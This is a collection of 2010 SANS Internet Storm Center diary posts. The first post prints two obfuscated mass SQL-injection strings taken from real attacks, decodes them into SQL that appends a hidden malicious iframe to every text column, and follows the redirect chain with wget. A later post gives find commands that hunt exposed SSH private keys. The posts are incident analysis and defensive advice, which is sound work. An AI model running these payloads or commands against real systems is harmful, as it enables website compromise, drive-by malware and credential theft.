Lawman Technology and Consulting Group LLC

Reader Alan reported a series of records that are similar to an SQL injection but are obfuscated. The following records were reported:

declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320

764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e61

6d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e6964

20614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e7854595

0653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d2

05461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657

845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722

834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343

73437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324

53730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343

34432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324

6363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c65

5f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c6

55f435552736f7220%20as%20varchar(4000));exec(@s);--

declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320

566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452

c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420

612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7

220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736

f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b27

2b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d2929

2b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363

8373536393643363436393639364532453732373532463734363437333246363736463245373036383730334637333639363433443331323232

3037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323

6343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345204173205641726348615228

31303629292729204645546348206e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f53652054

61624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);--

In both cases we see the use of the CAST command. What is its purpose? To change the information from a data type to another.Since the type of data that is contained in the sentence CAST is hexadecimal and varchar conversion is requested, we can do it manually with an ASCII table. Let's use the table in http://www.asciitable.com to perform the conversion. Keep in mind that two hexadecimal digits correspond to one byte. The conversion of the first seven bytes is as follows:





ATTACK # 1


ATTACK # 2




Byte


ASCII Equivalent


Byte


ASCII Equivalent




64


d


64


d




45


E


65


e




63


c


63


c




4C


L


6C


l




41


A


61


a




72


r


72


r




45


E


45


E







There are automatic tools to perform this task. Iuse Ascii Hex URL Decoder. If you like web tools, you can use http://nickciske.com/tools/hex.php.

After decoding attack #1, we obtain the following SQL sentence:

dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))') FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor

We now realize there is asecond CAST command present in the SQL sentence. Further decoding shows the following URL(modified http to hxxp to avoid clicking):

iframe src=hxxp://nemohuildiin.ru/tds/go.php?sid=1 width=0 height=0 style=display:none/iframe

This attack will try to update every varchar column in your database to append the iframe text shown. This has been a massive and successful attack. If you look into google for the iframe, you can notice many affected sites.

The IFRAME seems to be deactivated because it does not download any information (0 bytes of information). See the bold section below:
$ wget hxxp://nemohuildiin.ru/tds/go.php?sid=1

--2010-08-15 15:20:49-- hxxp://nemohuildiin.ru/tds/go.php?sid=1

Resolving nemohuildiin.ru... 59.53.91.195

Connecting to nemohuildiin.ru|59.53.91.195|:80... connected.

HTTP request sent, awaiting response... 302 Found

Location: hxxp://vamptoes.ru:8080/index.php?pid=13 [following]

--2010-08-15 15:20:51-- hxxp://vamptoes.ru:8080/index.php?pid=13

Resolving vamptoes.ru... 91.121.122.81, 178.32.5.233, 178.208.81.34, ...

Connecting to vamptoes.ru|91.121.122.81|:8080... connected.

HTTP request sent, awaiting response... 200 OK

Length: 0 [text/html]

Saving to: `index.php@pid=13.1'
[ = ] 0 --.-K/s in 0s
2010-08-15 15:20:52 (0.00 B/s) - `index.php@pid=13.1' saved [0/0]

Let us see now the SQLsentence from attack #2:

declarE @T VarchAr(255),@c VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd (b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set ['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe TabLE_cURsOR dEAlloCATE TaBlE_CURsoR

Again, there is a second CASTcommand inside the SQLsentence. Further decoding shows the following:

iframe src=hxxp://nemohuildiin.ru/tds/go.php?sid=1 width=0 height=0 style=display:none/iframe

SQL injection is bad and something people need to avoid by developing web applications safely. There are some tips for this:

Sanitize input data: Input entered from the user should not contain any sql sentences or commands at all. Check for good data by validating for type, length, format, and range.
Use store procedures: Your web application should have predetermined SQL sentences for data access. If the user request some specific information, the application invokes the specific store procedure, so there is no possibility of crafting dynamic SQL request.
Use an account with restricted permissions in the database. You should only grant execute permissions to selected stored procedures in the database and provide no direct table access.
Avoid disclosing database error information. Make sure you do not disclose detailed error messages to the user, because detailed error information shows the attacker where to check if the attack was unsuccessful.

-- Manuel Humberto Santander Pelez | http://twitter.com/manuelsantander| http://manuel.santander.name| msantand at isc dot sans dot org (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

I certainly agree that the amount of vulnerabilities is increasing and you have to be able to write tools by yourself to complete the required aspects for auditing web applications because current frameworks and vulnerabilityscannersdoesn't cover all critical possibilities.

There was an excellent conference at Blackhat about python as a tool to develop tools to test web application security. Find the video here: http://securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx
-- Manuel Humberto Santander Pelez | http://twitter.com/manuelsantander| http://manuel.santander.name| msantand at isc dot sans dot org (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Oracle is canceling Opensolaris project and focusing into Solaris 11. See below:
All of Oracles efforts on binary distributions of Solaris technology

will be focused on Solaris 11. We will not release any other binary

distributions, such as nightly or bi-weekly builds of Solaris

binaries, or an OpenSolaris 2010.05 or later distribution. We will

determine a simple, cost-effective means of getting enterprise users

of prior OpenSolaris binary releases to migrate to S11 Express.
More information at http://mail.opensolaris.org/pipermail/opensolaris-discuss/2010-August/059310.html
-- Manuel Humberto Santander Pelez | http://twitter.com/manuelsantander| http://manuel.santander.name| msantand at isc dot sans dot org (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Information Security, specifically the encryption technology used in BlackBerry, is under fire from the Indian government. The Canadian company Research in Motion (RIM), manufacturer of BlackBerry smartphones, has faced some challenges from a few foreign governments regarding the monitoring of BlackBerry data. A number of countries, in particular India, are applying a tremendous amount of pressure on RIM to release technology to allow their government agencies to decrypt BlackBerry data. a valid concern in this day and age. Citizens of some countries in the world today enjoy the right to a freedom of expression, however this is not everywhere. India, specifically, has a law that permits its government to intercept any computer communication without a court order. Additionally, RIM is a private company, operating within the border of a foreign country, one that is a large market share in the telecommunications arena. In this case, India as a sovereign government has every right to define their laws and boundaries. RIM has the right to act in the best interest of it's company and shareholders. the BlackBerry enterprise solution for one is the same for all.



The questions I'm looking for comment on today from you, the reader, is If a deal is struck where the ability to monitor communications is given over to another government or organization, what are the repercussions going to be? and What impact would this have on you, personally and professionally, in meeting your mobile technology demands? For example, BlackBerry is the device of choice for the US Army. Would the US government make the same decision next time?



I welcome your thoughts,



tony d0t Carothers _@_ gmail.com
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

The Shadowserver Foundation has made available a new and free public service to test the MD5's or SHA1's of binaries to see if they are already a know set of software. The initial service is based on the lists from NIST but over time they plan to add other sources. The service is offered via HTTP and the responses via a JSON object.
The service can be accessed here.
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Cisco IOS 15.1(2)T is affected by a denial of service (DoS) vulnerability during the TCP establishment phase. Cisco indicated that no authentication is required to exploit this vulnerability. The advisory and a list of workarounds are posted here.
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org
SEC 558: Coming to Toronto, ON in Nov 2010 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

QuickTime 7.6.7 is now available and address CVE-2010-1799.The update is available for Windows 7, Vista, XP SP2 or later. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. The update can be downloaded here.
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org
Comprehensive Packet Analysis en franais Qubec le 5 nov 2010 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

We have received some reports about a new SSH brute force script, possibly named dd_ssh, that gets dropped onto web servers, most likely via an older phpmyadmin vulnerability. If you have sample log entries from a successful attack or can share a copy of dd_ssh, please let us know.The current DShield figures do show a recent uptick in the number of sources that participate in SSH scanning.
Update 1735UTC: We have received several samples of dd_ssh, with MD524dac6bab595cd9c3718ea16a3804009. If your MD5 differs, please still send us a copy. It also looks like the vulnerability exploited is indeed in phpmyadmin, but seems to be the rather oldCVE-2009-1151. Again, if your infromation differs, please let us know. Thanks to all the ISCreaders who responded so far!
Update 2005UTC:Several readers have identified 91-193-157-206 as the most likely original source of the scanning for phpmyadmin's setup.exe. If successful, two files named vmsplice.txt and dd.txt were downloaded from that same IP. How exactly dd_ssh was installed is not yet clear, but most readers found it in /tmp after a POST request to phpmyadmin/scripts/setup.exe. A running dd_ssh was seen to talk to a bunch of IPs over port 54509 and 54510, this is most likely the CC connection.
Update 2020UTC: We got it reasonably established that the vulnerability exploited to drop the SSH scanner was indeed CVE-2009-1151. C'mon, folks, if you insist to have your phpmyadmin reachable from the Internet (why would you?? Access control isn't hard!) then please at least upgrade to the most current version, which at this time is 2.11.10 or 3.3.5. (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Overview of theAug 2010 MicrosoftPatchesand their status.


Update:Microsoft also released an advisory for an unpatched privilege escalation vulnerability
Update 2:Exploit code apparently exists for MS10-048, but it is not being seen in the wild at present.




#
Affected
Contra Indications
Known Exploits
Microsoft rating
ISC rating(*)


clients
servers





MS10-047
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (Replaces MS10-021 )


Windows Kernel

CVE-2010-1888

CVE-2010-1889

CVE-2010-1890
KB 981852
no known exploits.
Severity:Important

Exploitability: 1,2,?
Important
Important



MS10-048
Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (Replaces MS10-032 )


Windows Kernel

CVE-2010-1887

CVE-2010-1894

CVE-2010-1895

CVE-2010-1896

CVE-2010-1897
KB 2160329
PoC code apparently exists
Severity:Important

Exploitability: ?,1,1,1,1
Important
Impoortant



MS10-049
Vulnerabilities in SChannel could allow Remote Code Execution


IIS and SChannel

CVE-2009-3555

CVE-2010-2566
KB 980436
no known exploits.
Severity:Critical

Exploitability: 3,2
Important
Critical



MS10-050
Vulnerability in Windows Movie Maker Could Allow Remote Code Execution (Replaces MS10-016 )


Windows Movie Maker

CVE-2010-2564
KB 981997
no known exploits.
Severity:Important

Exploitability: 1
Critical
Important



MS10-051
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (Replaces MS08-069 )


Microsoft XML core services

CVE-2010-2561
KB 2079403
no known exploits.
Severity:Critical

Exploitability: 2
Critical
Critical



MS10-052
Vulnerability in Microsoft MPEG Layer-3 Codecs Could Allow Remote Code Execution


Microsoft MPEG Layer-3 Codecs

CVE-2010-1882
KB 2115168
no known exploits.
Severity:Critical

Exploitability: 1
Critical
Important



MS10-053
Cumulative Security Update for Internet Explorer (Replaces MS10-035 )


Internet Explorer

CVE-2010-1258

CVE-2010-2556

CVE-2010-2557

CVE-2010-2558

CVE-2010-2559

CVE-2010-2560
KB 2183461
no known exploits.
Severity:Critical

Exploitability: 3,2,1,2,2,1
Critical
Important



MS10-054
Vulnerabilities in SMB Server Could Allow Remote Code Execution


SMB server

CVE-2010-2550

CVE-2010-2551

CVE-2010-2552
KB 982214
no known exploits.
Severity:Critical

Exploitability: 2,3,3
Critical
Critical



MS10-055
Vulnerability in Cinepak Codec Could Allow Remote Code Execution


Cinepak codec

CVE-2010-2553
KB 982665
no known exploits.
Severity:Critical

Exploitability: 1
Critical
Important



MS10-056
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (Replaces MS09-068 M009-027 MS10-036 )


Word

CVE-2010-1900

CVE-2010-1901

CVE-2010-1902

CVE-2010-1903
KB 2269707
no known exploits.
Severity:Critical

Exploitability: 1,1,2,2
Critical
Important



MS10-057
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution (Replaces MS10-036 MS10-038 )


Excel

CVE-2010-2562
KB 2269707
no known exploits.
Severity:Important

Exploitability: 1
Critical
Important



MS10-058
Vulnerabilities in TCP/IP Could Allow Elevation of Privilege


Windows Networking (TCP/IP)

CVE-2010-1892

CVE-2010-1893
KB 978886
no known exploits.
Severity:Important

Exploitability: 3,1
Important
Important



MS10-059
Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege


Tracing Facility for Services

CVE-2010-2554

CVE-2010-2555
KB 982799
no known exploits.
Severity:Important

Exploitability: ?,1
Important
Important



MS10-060
Vulnerabilities in the Microsoft .NET Common Language Runtime and in Microsoft Silverlight Could Allow Remote Code Execution (Replaces MS09-061 )


.NET and Silverlight

CVE-2010-0019

CVE-2010-1898
KB 2265906
no known exploits.
Severity:Critical

Exploitability: 1,1
Critical
Critical






We will update issues on this page for about a week or so as they evolve.

We appreciate updates

US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

We use 4 levels:

PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
Critical: Anything that needs little to become interesting for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
Important: Things where more testing and other measures can help.
Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.


The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them



---------------

Jim Clausing, jclausing --at-- isc [dot] sans (dot) org

FOR408 coming to central OH in Sep, see http://www.sans.org/mentor/details.php?nid=22353 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

In view of all the brute force attacks still being attempted against Secure Shell (SSH), we have long since been extolling the virtues of forgoing passwords and moving to RSA/DSA keys instead.
While key based login indeed nicely addresses the problem of password guessing attacks, it looks like many a Unix admin has been less than diligent in the implementation. In pretty much every Unix security audit recently, we've come across unprotected or badly protected SSH private keys (id_dsa, id_rsa). Some reside plain flat out in the open, in /tmp and such. Others are found in world-readable tar backup archives of user and administrator home directories. Some are even built into home-grown Linux RPM and Solaris PKG packages, ready to be plucked off an install server.
It probably goes without saying, but let's repeat it nonetheless:

Whoever can access a TAR/ZIP/GZ archive, can read all its contents. Be super careful when you create a temporary archive copy of everything residing in a home directory. This copy is bound to include the .ssh directory, and the private keys therein
Whoever can access a RPM or PKG package, can read all its contents. Yes it is convenient to have the SSH keys that are part of your home-grown admin script suite already within the install package. But then don't be surprised if others make use of this convenience, too.

In a Unix penetration test within a company or academic institution network, we often first go looking for files and directories that can be read without authentication. Most large organizations have an install server from where they stage their new Unix systems, and often we find these install servers to openly share the package filesystem over NFS foreveryone. Other good choices are home directories, all too often also exported via NFS to everyone. Once read access is established, we can go hunting:
$find /mnt/some_exported_fs \( -name id_dsa -o -name id_rsa

$find /mnt/some_exported_fs -type d -name .ssh

$find /mnt/some_exported_fs -type f -name *.tar | egrep (^/|id_dsa|id_rsa|.ssh)
...etc. Adapt as needed for your environment.
To better protect your privates, please consider to

add a passphrase for all private keys that are used interactively. ssh-keygen -p can be used to add a passphrase to an existing private key
use a forced command for all private keys that are used in system automation, to limit the abuse potential. Use command=/bin/foo/bar in an authorized_keys file to limit what the corresponding private key can do



Keys without passphrase look differently from those that have one.If you want to make sure that your users also protect their privates, you can (as root) search for keys without passphrase with the following command
#find / \( -name id_dsa -o -name id_rsa \) -exec egrep -L Proc-Type 2/dev/null
Newer DSA/RSA Keys contain the string Proc-Type as part of the key file when a password is set on the key. The above command lists all those key files where this isn't the case (egrep -L)
If you got additional tips on how to protect SSH private keys on Unix, or how to best locate misplaced / unprotected private keys, please let us know.
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

This is a busy day for the folks doing patching out there. Aside from the MSpatches released today, Adobe also released a bunch of security updates.
Here are the links to the each of the security updates,
Flash Media Server - Rating :Critical (rated by Adobe)
Adobe AIRand Flash - Rating :Critical (rated by Adobe)
ColdFusion - Rating :Important (rated by Adobe)
With the current exploitation trend, the Flash vulnerability should be a high priority for patching. Happy patching.

--------------------

Jason Lam (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Tom wrote in to the handlers list today and asked a question that Ithink our readers can help with (especially since we've gotten so many great ideas from the diary asking for suggestions for Cyber Security Month). He is looking for tools to allow for more proactive monitoring of his systems, but given shrinking budgets (he works in government, but the situation isn't much better anywhere else), he's looking for something free or, at least, inexpensive. What are you using to monitor patch status? application versions? A/V? behavior? strange files? network devices? anything else? Is it centrally managed? Does it scale?
---------------

Jim Clausing, jclausing --at-- isc [dot] sans (dot) org

FOR408 Computer Forensics Essentials coming to central OH in Sept, see http://www.sans.org/mentor/details.php?nid=22353 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

---------------

Jim Clausing, jclausing --at-- isc [dot] sans (dot) org (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

As most of our readers know, the past three years we participated in Cyber Security Awareness Month by covering a special topic each day. We are less than two months away from this year's awareness campaign and we are looking for your ideas on what we should focus on this year. Here are links to summaries of the past three years so that you can see what we've done:

2007: http://isc.sans.edu/diary.html?storyid=3597

2008: http://isc.sans.edu/diary.html?storyid=5279

2009: http://isc.sans.edu/diary.html?storyid=7504
The handlers were discussing this topic a couple of weeks ago and came up with some ideas. Here is what we've been noodling as possible topics for 2010:
- Key services that should or should not be running, and how to secure those services that are necessary

- How to secure popular applications in categories like social (Facebook, etc.), desktop (MS Office, etc.), mobile (iPhone apps, etc.), web apps (online banking, etc.) and cloud (Google Docs, etc.)

- How to use security tools like Nessus or Wireshark

- Manipulating Windows registry settings

- Security horror stories
We'd really like to do something that has a lot of meaning for our readership. So use the comment link below to add your ideas and thoughts, or if you want to share your thoughts privately with us use our contact form. In the past, we've had a general theme for the entire month then discussed sub-themes each week. If you look back at the previous years you can see how that theme is carried out.
Marcus H. Sachs

Director, SANSInternet Storm Center (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Two of our readers (thanksJason and Mike!) have written in to highlight the ongoing DDOS againstDNS Made Easy.
You can read the ongoing reports via their twitter page. The DDOS is reported to be circa 50Gb/sec in size. If you have any details on the type of attack we'd love to know.
Steve Hall
ISCHandler (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Seb dropped me a note today to ask to remind our readers that we are on countdown to a bumper crop of patches being released by Microsoft on Tuesday.
On Microsofts Advanced Notification website they are reporting 14 bulletins, with 8 criticals and 6 importants. Given that all the criticals are all remote code executing in classification it's time to dust off your monthly patching process and get it all ship shape ready for the fun to start.
Given we have a few days between Seb's timely reminder, and when we need to push the patch button, how good do you think your patching processes are. How to you measure their effectiveness, how to you measure their maturity?
Maybe you consider scoring them against a scale such as COBIT? There is a nice table which explains the ratings within COBIT (taken from SEI Capability Maturity Model (CMM)) on the ISACA site which i've taken and reproduced below:


Level 0: Non-existent
Level 1: Initial/ad hoc
Level 2: Repeatable but Intuitive
Level 3: Defined Process
Level 4: Managed and Measurable
Level 5: Optimized

Given the frequency which suppliers, including Microsoft, release such patches, where would you score yourself?
If you score somewhere between 3, and 4 in that you have a process, but you dont measure your success, what would you do to get you up towards a 4, or maybe even a 5.
Let me know before you get busy patching those systems, and i'll update with the best suggestions.
Steve Hall

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

www.foxitsoftware.com/announcements/2010861227.html=============== Rob VandenBrink Metafore (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

It seems that every time I do a security assessment or pentest, the findings include problems with access controls for things like routers, switches, fiber channel switches, bladecenters and the like. And when I say every time, I really mean EVERY TIME. So, what kind of problems are common, and what can you do to prevent them?



Default Credentials



People love default credentials. I've actually had a customer tell me if we forget the password, we can just google for it - like somehow that's a good thing. Even for gear that comes with default credentials that force you to change them on login (for instance, fiber channel switches), I've seen other engineers then change the password back to the default - their rationalle being that it reduces their support calls later.



The number of bladecenters that I've seen that have changed the default admin user and password I think I can count without taking my shoes off (ie - it's a small number - almost nobody changes their bladecenter admin password). This access gives the right to power off servers, decommission servers, unpatch servers, hack windows or linux passwords, almost everything is possible - the bladecenter admin access gives you the near-equivalent of physical access, and we all know that physical access trumps almost every control in the book.



People - default credentials are BAD. If you are using default userid and password, and someone compromises you, we don't call that hacking, we call it logging in. You don't need an uber-hacker to target you in this situation, ANYONE WITH GOOGLE can compromise you. Change the admin password on your gear, and if possible, change the admin userid. Better yet, back end admin logins with another directory (read on ...)



Prevent Access in the First Place - Access Classes

Many products will allow you to restrict administrative access in the configuration. For instance, Cisco gear has the access-class config statement. HP, Brocade, Juniper and others all have an equivalent construct. The commands you'd put in your switch or router config might be:



first, define the subnet or ip addresses of authorized administrative workstations
ip access-list standard ACL-ACCESS-CLASS

permit host 192.168.72.10

permit 192.168.68.0 0.0.0.255


next, apply the ACL to your access
line vty 0 15

access-class ACL-ACCESS-CLASS in





Prevent Access in the First Place, Reloaded - Define a Management Network



Even with all the other controls we'll talk about, implementing a management network is a good move. It zones all infrastructure admin into one place, you can control access to this netowrk using VPN controls or a jump box. The VPN approach is a neat one - it means that if you are an authorized admin, you can use an IPSEC or SSL VPN solution to get an IP that has access to admin your network from anywhere in the company. This is really handy for admins that are mobile within the company or have to provide support from home (or the cottage, the beach, or anywhere else they can find you).



Encrypt all Administrative Accesses

I still see LOTS of admin access over standard HTTP and Telnet. And there are LOTS of tools that will strip passwords out of this type of traffic - you can do this with CAIN if you want a GUI, but really even doing it with wireshark or tcpdump is pretty simple. Be sure to force SSH (Version 2 if you can, Version 1 can be decrypted), or HTTPS for administration of critical network infrastructure.



Even what you might consider non-critical infrastructure should see the same protections. I've done a pentest on a company that used telnet to administer their UPS gear (to monitor temperature and humidity as well as power characteristics and remote control of power etc). Unfortunately for them, they used their AD admin password to login to their UPS, which they accessed using plaintext HTTP and Telnet. Doubly unfortunate, as a standard procedure they logged in each morning to check logs etc.



Checking logs daily would normally be a really good thing if they had other controls in place (for instance, using HTTPS or SSH for administration), but since they were being pentested, I had their admin password within 10 minutes of starting the actual process !



On a cisco router or switch, the commands you need to set up SSH are:



first, define a hostname and domain name
hostname yourdevicename

ip domain-name yourcompany.com



next, generate the key

(use some number equal or greater than 1024 for stronger key strength)



crypto key generate rsa general-keys modulus 1024


next, force SSH version 2 and force SSH for access

ip ssh version 2


line vty 0 15

transport input ssh






If you allow web administrative access (that's a whole different discussion), forcing https on network instrastructure is generally even easier:



disable plaintext HTTP
no ip http server



enable SSL encrypted HTTPS

entering this last line will generate the (self-signed) SSL cert to

encrypt the webmin sessions.



ip http secure-server





To go one better, I'd also suggest that you replace the self-signed certs that is used by default for HTTPS admin on most gear, using certs on SSH is also a really good mechanism. Without replacing the default certificates, tools like ettercap can still be used to mount a man-in-the-middle attack and recover passwords.



Back-end Authentication and Change Logging



After everything else is said and done, there's still way too much gear out there that has a single administrative account, or no account at all (only access passwords). This plays hob with managing change - since every config update is done using the single admin account, if a change goes bad everyone in your team can deny making that change. (Does your team have Ida Know as an honorary member?) If you don't take a stab at non-repudiation of changes, this WILL bite you eventually.



So, what to do? Should you define a userid for each and every user on all your infrastructure gear? Well, only as a lastresort. Most network infrastructure has the capability of back-ending authentication and access controls using some external source. Popular back-ends are what you'd expect - RADIUS, TACACS, Kerberos, LDAP and Active Directory. I'd say pick one and go with it. I often go with RADIUS back-ended with AD(IAS, now NPS)because it's simple, easy to troubleshoot, and supported by almost everything. Mind you, it's also likely that if you go with RADIUS you are then susceptible to other attacks, but you can mitigate that by setting your RADIUS server up in a private vlan or by using other intelligent design decisions to implement security controls.




Basic definition of AAA, as well as the definition of the RADIUSserver

(Note that the RADIUSserver config will need to match this)


aaa new-model

radius-server host 1.2.3.4

auth-port 1645 acct-port 1646 key randomcharkey



this line forces radius authentication for login by default. If radius is down (ie - no response is received from the radius server, or the radius keepalive is missed), then local authentication still works. Note that on one hand this leaves you open to attacks that involve DOSing your RADIUS server. On the other hand, you still have access to your network gear if your RADIUS servers or domain controllers are offline.
aaa authentication login default group radius local


defining the source interface is important, since the ip of the device is normally hard-coded on the radius server
ip radius source-interface Vlan1


on some gear you may also need to force authentication on individual lines:
line vty 0 4

login authentication radius

line console 0

login authentication radius

line aux 0

login authentication radius





Don't forget to LOG ALL ACCESSES (this is built into RADIUS and TACACS) and LOG ALL CONFIG CHANGES (lots of tools will do this for you - syslog will log that a change occurred and who made it, CATTOOLS and RANCID(thanks to our reader Bmac for this correction)are 2 that come to mind for more complete change logging, I've also written shell scripts to do this. Feel free to suggest others that you use as a comment to this diary). In some cases, you may also want to log all commands as well (most gear will let you do this in syslog).
What does this give you? As changes occur, you are notified that a change happened, who made it, and what it was. You can then compare this to the CHANGE REQUEST FORM that you have in your CHANGE CONTROL SYSTEM, to be sure that:

the change made was both requested and approved
the change happened during the change window
the person making the change was the one authorized to do it

if it was an unauthorized change, you have the culprit identified and can have, shall we say, a discussion that's appropriate to the situation.
Basic commands for simple logging and NTPtime sync are, well, pretty simple (as with most examples in this diary, it can get more complicated)



Basic Syslog logging is a one-liner
logging 192.168.5.7


Similarly, setting a target host to get time from is also very simple
ntp server 192.168.5.6





I've phrased this discussion in the context of network infrastructure gear, but really many of these points extend to other datacenter infrastructure components as well. Replacing default certificates used for RDP to critical Windows servers is a good move, as is certificate updates for things like VMware vSphere (both vCenter servers and ESX Hosts). Using a Management network is an important part of designing a virtual infrastructure from any vendor, as well as bladecenters (for the same reasons). Management networks can also be used to protect things like RADIUS authentication, syslog, NTP and SNMP based network management, all of which are sent in cleartext. Back-end authentication to an enterprise directory (often AD) is a common solution for authentication, is useful as we discussed for managing and auditing change for both Linux and VMware servers, as well as for lots of other gear besides just routers and switches.



I'm hoping that you find these suggestions to be a helpful starting point. There's lots more that can be done in this area, please use the comment feature to let us know if you've found this useful, have your own stories in this area, or if I've missed (or messed up) anything in this diary.
=============== Rob VandenBrink, Metafore ===============

